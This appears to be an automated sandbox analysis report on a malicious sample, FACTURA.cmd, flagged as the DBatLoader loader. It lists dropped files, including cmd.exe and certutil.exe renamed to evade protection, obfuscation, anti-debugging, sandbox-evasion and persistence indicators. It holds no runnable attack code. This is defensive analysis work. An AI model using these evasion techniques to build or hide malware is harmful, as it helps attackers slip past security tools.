Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior

Source: C:\Users\Public\Libraries\Host.COM

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F5FB2C77-0E2F-4A16-A381-3E560C68BC83}\InProcServer32

Binary contains a suspicious time stamp

Source: FACTURA.cmd

Static file information: File size 7518388 > 1048576

Source:	Binary string: easinvoker.pdb source: Host.COM, Host.COM, 00000009.00000002.3035851816.0000000002E1E000.00000004.00001000.00020000.00000000.sdmp, Host.COM, 00000009.00000002.3033680777.0000000002266000.00000004.00001000.00020000.00000000.sdmp, Host.COM, 00000009.00000003.1800195729.000000007FC10000.00000004.00001000.00020000.00000000.sdmp, Host.COM, 00000009.00000003.1801015000.000000007F8A0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: cmd.pdbUGP source: alpha.exe, 00000003.00000000.1772397847.00007FF793772000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000005.00000002.1786876081.00007FF793772000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000005.00000000.1776065689.00007FF793772000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000007.00000000.1787491764.00007FF793772000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000007.00000002.1795092771.00007FF793772000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000A.00000000.1796653193.00007FF793772000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000A.00000002.1799303779.00007FF793772000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000B.00000000.1799884208.00007FF793772000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000B.00000002.1801167117.00007FF793772000.00000002.00000001.01000000.00000004.sdmp, alpha.exe.2.dr
Source:	Binary string: certutil.pdb source: kn.exe, 00000006.00000000.1776491756.00007FF7E08AE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000006.00000002.1784579470.00007FF7E08AE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000000.1787962388.00007FF7E08AE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000002.1794360108.00007FF7E08AE000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: cmd.pdb source: alpha.exe, 00000003.00000000.1772397847.00007FF793772000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000005.00000002.1786876081.00007FF793772000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000005.00000000.1776065689.00007FF793772000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000007.00000000.1787491764.00007FF793772000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000007.00000002.1795092771.00007FF793772000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000A.00000000.1796653193.00007FF793772000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000A.00000002.1799303779.00007FF793772000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000B.00000000.1799884208.00007FF793772000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000B.00000002.1801167117.00007FF793772000.00000002.00000001.01000000.00000004.sdmp, alpha.exe.2.dr
Source:	Binary string: easinvoker.pdbGCTL source: Host.COM, 00000009.00000002.3035851816.0000000002E1E000.00000004.00001000.00020000.00000000.sdmp, Host.COM, 00000009.00000003.1800405801.000000000286A000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 00000009.00000002.3034224686.0000000002871000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 00000009.00000002.3033680777.0000000002266000.00000004.00001000.00020000.00000000.sdmp, Host.COM, 00000009.00000003.1800195729.000000007FC10000.00000004.00001000.00020000.00000000.sdmp, Host.COM, 00000009.00000003.1801015000.000000007F8A0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: certutil.pdbGCTL source: kn.exe, 00000006.00000000.1776491756.00007FF7E08AE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000006.00000002.1784579470.00007FF7E08AE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000000.1787962388.00007FF7E08AE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000002.1794360108.00007FF7E08AE000.00000002.00000001.01000000.00000005.sdmp

Data Obfuscation

Yara detected DBatLoader

Source: Yara match

File source: 9.2.Host.COM.2df0000.2.unpack, type: UNPACKEDPE

Source: alpha.exe.2.dr

Static PE information: 0xE1CBFC53 [Mon Jan 16 09:26:43 2090 UTC]

Contains functionality to dynamically determine API calls

Source: C:\Users\Public\Libraries\Host.COM

Code function: 9_2_02E08954 LoadLibraryW,GetProcAddress,FreeLibrary,

PE file contains sections with non-standard names

Source: alpha.exe.2.dr	Static PE information: section name: .didat
Source: kn.exe.4.dr	Static PE information: section name: .didat

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07C3668 push rsp; ret	6_2_00007FF7E07C3669
Source: C:\Users\Public\Libraries\Host.COM	Code function: 9_2_02E1D2FC push 02E1D367h; ret	9_2_02E1D35F
Source: C:\Users\Public\Libraries\Host.COM	Code function: 9_2_02DF63D3 push 02DF640Bh; ret	9_2_02DF6403
Source: C:\Users\Public\Libraries\Host.COM	Code function: 9_2_02E1C374 push 02E1C56Ah; ret	9_2_02E1C562
Source: C:\Users\Public\Libraries\Host.COM	Code function: 9_2_02DF332C push eax; ret	9_2_02DF3368
Source: C:\Users\Public\Libraries\Host.COM	Code function: 9_2_02E1D0AC push 02E1D125h; ret	9_2_02E1D11D
Source: C:\Users\Public\Libraries\Host.COM	Code function: 9_2_02E03073 push 02E030C1h; ret	9_2_02E030B9
Source: C:\Users\Public\Libraries\Host.COM	Code function: 9_2_02E03074 push 02E030C1h; ret	9_2_02E030B9
Source: C:\Users\Public\Libraries\Host.COM	Code function: 9_2_02E1D1F8 push 02E1D288h; ret	9_2_02E1D280
Source: C:\Users\Public\Libraries\Host.COM	Code function: 9_2_02E1D144 push 02E1D1ECh; ret	9_2_02E1D1E4
Source: C:\Users\Public\Libraries\Host.COM	Code function: 9_2_02E0F104 push ecx; mov dword ptr [esp], edx	9_2_02E0F109
Source: C:\Users\Public\Libraries\Host.COM	Code function: 9_2_02DF678C push 02DF67CEh; ret	9_2_02DF67C6
Source: C:\Users\Public\Libraries\Host.COM	Code function: 9_2_02DF678A push 02DF67CEh; ret	9_2_02DF67C6
Source: C:\Users\Public\Libraries\Host.COM	Code function: 9_2_02DFD5A8 push 02DFD5D4h; ret	9_2_02DFD5CC
Source: C:\Users\Public\Libraries\Host.COM	Code function: 9_2_02E1C56C push 02E1C56Ah; ret	9_2_02E1C562
Source: C:\Users\Public\Libraries\Host.COM	Code function: 9_2_02DFC574 push ecx; mov dword ptr [esp], edx	9_2_02DFC579
Source: C:\Users\Public\Libraries\Host.COM	Code function: 9_2_02E08AD2 push 02E08B0Ch; ret	9_2_02E08B04
Source: C:\Users\Public\Libraries\Host.COM	Code function: 9_2_02E08AD4 push 02E08B0Ch; ret	9_2_02E08B04
Source: C:\Users\Public\Libraries\Host.COM	Code function: 9_2_02E0AADB push 02E0AB14h; ret	9_2_02E0AB0C
Source: C:\Users\Public\Libraries\Host.COM	Code function: 9_2_02E0AADC push 02E0AB14h; ret	9_2_02E0AB0C
Source: C:\Users\Public\Libraries\Host.COM	Code function: 9_2_02DFCBF4 push 02DFCD7Ah; ret	9_2_02DFCD72
Source: C:\Users\Public\Libraries\Host.COM	Code function: 9_2_02E08874 push 02E088B6h; ret	9_2_02E088AE
Source: C:\Users\Public\Libraries\Host.COM	Code function: 9_2_02E64850 push eax; ret	9_2_02E64920
Source: C:\Users\Public\Libraries\Host.COM	Code function: 9_2_02DFC9E6 push 02DFCD7Ah; ret	9_2_02DFCD72
Source: C:\Users\Public\Libraries\Host.COM	Code function: 9_2_02E0694E push 02E069FBh; ret	9_2_02E069F3
Source: C:\Users\Public\Libraries\Host.COM	Code function: 9_2_02E06950 push 02E069FBh; ret	9_2_02E069F3
Source: C:\Users\Public\Libraries\Host.COM	Code function: 9_2_02E07914 push 02E07991h; ret	9_2_02E07989
Source: C:\Users\Public\Libraries\Host.COM	Code function: 9_2_02E05E84 push ecx; mov dword ptr [esp], edx	9_2_02E05E86
Source: C:\Users\Public\Libraries\Host.COM	Code function: 9_2_02E02F68 push 02E02FDEh; ret	9_2_02E02FD6

Persistence and Installation Behavior

Drops PE files with a suspicious file extension

Source: C:\Users\Public\kn.exe

File created: C:\Users\Public\Libraries\Host.COM

Drops PE files to the user directory

Drops PE files

Source: C:\Users\Public\kn.exe	File created: C:\Users\Public\Libraries\Host.COM	Jump to dropped file
Source: C:\Windows\System32\extrac32.exe	File created: C:\Users\Public\alpha.exe	Jump to dropped file
Source: C:\Windows\System32\extrac32.exe	File created: C:\Users\Public\kn.exe	Jump to dropped file

Source: C:\Windows\System32\extrac32.exe	File created: C:\Users\Public\alpha.exe			Jump to dropped file
Source: C:\Windows\System32\extrac32.exe	File created: C:\Users\Public\kn.exe			Jump to dropped file

Boot Survival

Drops PE files to the user root directory

Source: C:\Windows\System32\extrac32.exe	File created: C:\Users\Public\alpha.exe			Jump to dropped file
Source: C:\Windows\System32\extrac32.exe	File created: C:\Users\Public\kn.exe			Jump to dropped file

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Source: C:\Users\Public\Libraries\Host.COM

Code function: 9_2_02DF676A IsIconic,

9_2_02DF676A

Extensive use of GetProcAddress (often used to hide API calls)

Source: C:\Users\Public\Libraries\Host.COM

9_2_02E0AB18

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Source: C:\Users\Public\Libraries\Host.COM	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX			Jump to behavior

Malware Analysis System Evasion

Allocates many large memory junks

Source: C:\Users\Public\Libraries\Host.COM	Memory allocated: 2DF0000 memory commit 570007552	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Memory allocated: 2DF1000 memory commit 570179584	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Memory allocated: 2E1D000 memory commit 570003456	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Memory allocated: 2E1E000 memory commit 570351616	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Memory allocated: 2E74000 memory commit 571015168	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Memory allocated: 2F6E000 memory commit 570015744	Jump to behavior

Found large amount of non-executed APIs

Source: C:\Users\Public\alpha.exe	API coverage: 8.1 %
Source: C:\Users\Public\alpha.exe	API coverage: 8.6 %
Source: C:\Users\Public\kn.exe	API coverage: 0.8 %
Source: C:\Users\Public\alpha.exe	API coverage: 9.6 %
Source: C:\Users\Public\alpha.exe	API coverage: 9.6 %

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF79375823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,	3_2_00007FF79375823C
Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF793752978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,	3_2_00007FF793752978
Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF793767B4C FindFirstFileW,FindNextFileW,FindClose,	3_2_00007FF793767B4C
Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF7937435B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,	3_2_00007FF7937435B8
Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF793741560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,	3_2_00007FF793741560
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF79375823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,	5_2_00007FF79375823C
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF793752978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,	5_2_00007FF793752978
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF793767B4C FindFirstFileW,FindNextFileW,FindClose,	5_2_00007FF793767B4C
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF7937435B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,	5_2_00007FF7937435B8
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF793741560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,	5_2_00007FF793741560
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E087234C wcschr,#357,#357,#359,FindFirstFileW,wcsrchr,_wcsnicmp,iswxdigit,wcstoul,FindNextFileW,#359,#359,#357,#357,LocalFree,LocalFree,FindClose,	6_2_00007FF7E087234C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E080C6F8 memset,qsort,#357,FindFirstFileW,GetLastError,bsearch,LocalAlloc,LocalReAlloc,LocalAlloc,FindNextFileW,GetLastError,DeleteFileW,GetLastError,#359,#357,FindClose,LocalFree,LocalFree,	6_2_00007FF7E080C6F8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0876F80 #359,FindFirstFileW,FindNextFileW,FindClose,LocalAlloc,#357,	6_2_00007FF7E0876F80
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E08710C4 #357,FindFirstFileW,LocalFree,FindNextFileW,FindClose,LocalFree,#357,	6_2_00007FF7E08710C4
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0873100 #357,FindFirstFileW,#359,FindNextFileW,FindClose,LocalFree,#357,	6_2_00007FF7E0873100
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E081B3D8 GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,I_CryptCreateLruCache,GetLastError,I_CryptCreateLruCache,GetLastError,#357,	6_2_00007FF7E081B3D8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E081D4A4 CreateSemaphoreW,GetLastError,CreateEventW,GetLastError,GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,CloseHandle,CloseHandle,	6_2_00007FF7E081D4A4
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07DD440 GetFileAttributesW,#357,#357,#357,FindFirstFileW,LocalFree,#357,FindNextFileW,#357,LocalFree,FindClose,LocalFree,LocalFree,LocalFree,LocalFree,	6_2_00007FF7E07DD440
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0853674 #357,LocalAlloc,#357,wcsrchr,FindFirstFileW,GetLastError,#359,lstrcmpW,lstrcmpW,#359,RemoveDirectoryW,GetLastError,#359,#359,FindNextFileW,FindClose,LocalFree,LocalFree,DeleteFileW,GetLastError,#359,	6_2_00007FF7E0853674
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E08719F8 #359,FindFirstFileW,FindNextFileW,FindClose,	6_2_00007FF7E08719F8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0871B04 FindFirstFileW,GetLastError,#357,#359,DeleteFileW,FindNextFileW,FindClose,#359,	6_2_00007FF7E0871B04
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E081DBC0 FindFirstFileW,GetLastError,CertOpenStore,CertAddStoreToCollection,CertCloseStore,FindNextFileW,GetLastError,GetLastError,#357,GetLastError,GetLastError,#357,LocalFree,CertCloseStore,CertCloseStore,FindClose,	6_2_00007FF7E081DBC0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0815E58 GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,	6_2_00007FF7E0815E58
Source: C:\Users\Public\Libraries\Host.COM	Code function: 9_2_02DF5908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,	9_2_02DF5908
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF79375823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,	10_2_00007FF79375823C
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF793752978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,	10_2_00007FF793752978
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF793767B4C FindFirstFileW,FindNextFileW,FindClose,	10_2_00007FF793767B4C
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF7937435B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,	10_2_00007FF7937435B8
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF793741560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,	10_2_00007FF793741560
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF79375823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,	11_2_00007FF79375823C
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF793752978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,	11_2_00007FF793752978
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF793767B4C FindFirstFileW,FindNextFileW,FindClose,	11_2_00007FF793767B4C
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF7937435B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,	11_2_00007FF7937435B8
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF793741560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,	11_2_00007FF793741560

Source: C:\Users\Public\kn.exe

6_2_00007FF7E085511C

Source: Host.COM, 00000009.00000002.3032889978.00000000007FF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWx
Source: Host.COM, 00000009.00000002.3032889978.000000000084D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW

Source: C:\Users\Public\Libraries\Host.COM

API call chain: ExitProcess graph end node

Anti Debugging

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Source: C:\Users\Public\Libraries\Host.COM

Code function: 9_2_02E0F740 GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent,

9_2_02E0F740

Checks if the current process is being debugged

Source: C:\Users\Public\Libraries\Host.COM

Process queried: DebugPort

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\Public\alpha.exe

Code function: 3_2_00007FF7937663FC GetCurrentThreadId,IsDebuggerPresent,OutputDebugStringW,

3_2_00007FF7937663FC

Contains functionality to dynamically determine API calls

Source: C:\Users\Public\Libraries\Host.COM

Code function: 9_2_02E08954 LoadLibraryW,GetProcAddress,FreeLibrary,

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\Public\alpha.exe

Code function: 3_2_00007FF79375823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,

3_2_00007FF79375823C

Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF793758FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_00007FF793758FA4
Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF7937593B0 SetUnhandledExceptionFilter,	3_2_00007FF7937593B0
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF793758FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	5_2_00007FF793758FA4
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF7937593B0 SetUnhandledExceptionFilter,	5_2_00007FF7937593B0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E08A4E18 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	6_2_00007FF7E08A4E18
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E08A53E0 SetUnhandledExceptionFilter,	6_2_00007FF7E08A53E0
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF793758FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	10_2_00007FF793758FA4
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF7937593B0 SetUnhandledExceptionFilter,	10_2_00007FF7937593B0
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF793758FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	11_2_00007FF793758FA4
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF7937593B0 SetUnhandledExceptionFilter,	11_2_00007FF7937593B0

HIPS / PFW / Operating System Protection Evasion

Drops or copies certutil.exe with a different name (likely to bypass HIPS)

Source: C:\Windows\System32\extrac32.exe

File created: C:\Users\Public\kn.exe

Drops or copies cmd.exe with a different name (likely to bypass HIPS)

Source: C:\Windows\System32\extrac32.exe

File created: C:\Users\Public\alpha.exe